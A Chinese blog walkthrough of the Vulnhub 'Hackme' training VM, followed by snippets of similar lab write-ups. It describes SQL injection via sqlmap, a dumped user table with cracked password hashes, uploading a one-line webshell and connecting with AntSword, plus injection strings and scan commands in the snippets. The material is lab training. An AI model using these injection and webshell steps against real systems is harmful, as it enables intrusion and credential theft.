【Vulnhub靶机之Hackme】

时间：2024-07-29 21:27:47浏览次数：13

标签：test1 +----+--------------+------------+----------------+-----------------------

第一步：打开靶机

第二步：查看虚拟靶机ip

、

第三步：查看连接80端口的ip

第四步:扫描出靶机的ip地址

第五步：扫描靶机地址下的目录

访问login.php目录

点击注册

点击，可以看到许多的书名

第六步：使用burpsuite抓包

在111后面加*号

保存抓到的文件为post.txt

第七步:使用sqlmap

查数据库

python3 sqlmap.py -r 文件路径 --current-db --batch

查看表名

查看敏感信息

+----+--------------+------------+----------------+---------------------------------------------+
| id | name | user | address | pasword |
+----+--------------+------------+----------------+---------------------------------------------+
| 1 | David | user1 | Newton Circles | 5d41402abc4b2a76b9719d911017c592 (hello) |
| 2 | Beckham | user2 | Kensington | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| 3 | anonymous | user3 | anonymous | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| 10 | testismyname | test | testaddress | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 11 | superadmin | superadmin | superadmin | 2386acb2cf356944177746fc92523983 |
| 12 | test1 | test1 | test1 | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 13 | csl | sloane | jkvs | e10adc3949ba59abbe56e057f20f883e (123456) |
+----+--------------+------------+----------------+---------------------------------------------+

解密密码

第八步：使用查到的用户名密码登录

第九步：插入一句话木马

上传一句话木马成功

访问，写入成功

第十步：使用蚁剑连接

标签：test1,+----+--------------+------------+----------------+-----------------------
From： https://blog.csdn.net/weixin_57240513/article/details/140769917

【Vulnhub靶场AI-WEB-1.0打靶教程】
第一步：查看虚拟机的ip第二步：扫描ip下开放的80端口第三步：扫描查到的ip地址下的目录第四步：访问查到的目录访问robot.txt第五步:访问robot.txt显示出的目录第六步：打开kali终端，使用sqlmap功能sqlmap-u"http://192.168.189.153/se3reTdir777/index.php"-data"uid=......
【Vulnhub靶机tomato渗透】
第一步：端口扫描我使用的是webrobot访问这个ip，就是它了第二步：目录扫描打开kali使用dirb命令扫描http://192.168.189.154下的目录dirbhttp://192.168.189.154扫描到目录。第三步：访问目录地址看到有几个php的文件第四步：查看访问php的文件我查看的antibot.php是......
tomato-靶机渗透
tomato-靶机一、安装靶机环境下载双击.ova文件，写文件名路径导入打开虚拟机用NAT模式编辑–>虚拟网络编辑器查看IP段二、信息收集1.御剑端口扫描查找该虚拟机的IP访问网站扫目录dirbhttp://192.168.30.130收集到目录/server-status/antibot_image//ind......
hackme-1靶机
目录扫描发现该网址存放上传文件注册一个账户，点击搜索验证是否存在sql注入漏洞WindowsOS'and1=1#WindowsOS'and1=2#存在sql注入漏洞判断列数WindowsOS'orderby3#WindowsOS'orderby4#所以，有3列；判断回显位置-1'unionselect1,2,3#查看当......
【Vulnhub系列】Vulnhub_SecureCode1靶场渗透（原创）
【Vulnhub系列靶场】Vulnhub_SecureCode1靶场渗透原文转载已经过授权原文链接：Lusen的小窝-学无止尽，不进则退(lusensec.github.io)一、环境配置1、从百度网盘下载对应靶机的.ova镜像2、在VM中选择【打开】该.ova3、选择存储路径，并打开4、之后确认网络连接模式是......
【Vulnhub系列】Vulnhub_DC-1靶场渗透（原创）
【Vulnhub系列靶场】Vulnhub_DC-1靶场渗透原文转载已经过授权原文链接：Lusen的小窝-学无止尽，不进则退(lusensec.github.io)一、环境准备1、在百度网盘中下载DC-1靶场。DC-1靶场受virtualbox的影响，在VM中直接打开是扫描不到IP的，我们需要先解决这个问题：【其他经验】V......
Tomato靶机
Tomato靶机对通网段进行主机发现：分别进行目录扫描：进行访问：发现有弹窗尝试抓包，发现没有任何参数，也不能进行爆破查找资料发现8080端口存在可访问的目录，一个一个点进去发现phpinfo文件查看源码有文件包含漏洞，且参数为flie尝试访问etc/passwd对此ip进行全端口扫描......
DC-2靶机详解
DC-2信息搜集IP探测netdiscover-r192.168.179.0/24得到ip为192.168.179.133。端口探测先看开放了哪些端口。nmap-sT--min-rate10000-p-192.168.179.133有个7744不知道什么玩意儿。nmap两步走（udp不用扫了，没攻击思路了再说），详细端口扫描nmap-sT-sV......
Vulnhub-Empire Breakout
简介名称：Vulnhub-Empire:Breakout发布日期：2021年10月21日难度：容易描述：这个盒子被创建为一个简单盒子，但如果你迷路了，它可以是中等的。下载地址：https://www.vulnhub.com/entry/empire-breakout,751/kali攻击机ip：192.168.1.4靶机地址：192.168.1.33渗透流程信息收集a......
vulnhub DC-7
探测局域网内存活主机nmap-sP192.168.19.128/24发现存活主机192.168.19.134,扫描其开放端口nmap-p-192.168.19.134结果如下22/tcpopenssh80/tcpopenhttp访问80端口渗透现用whatweb扫描看一下是什么whatweb-v192.168.19.134发现使用的是Drupal开源CMS框......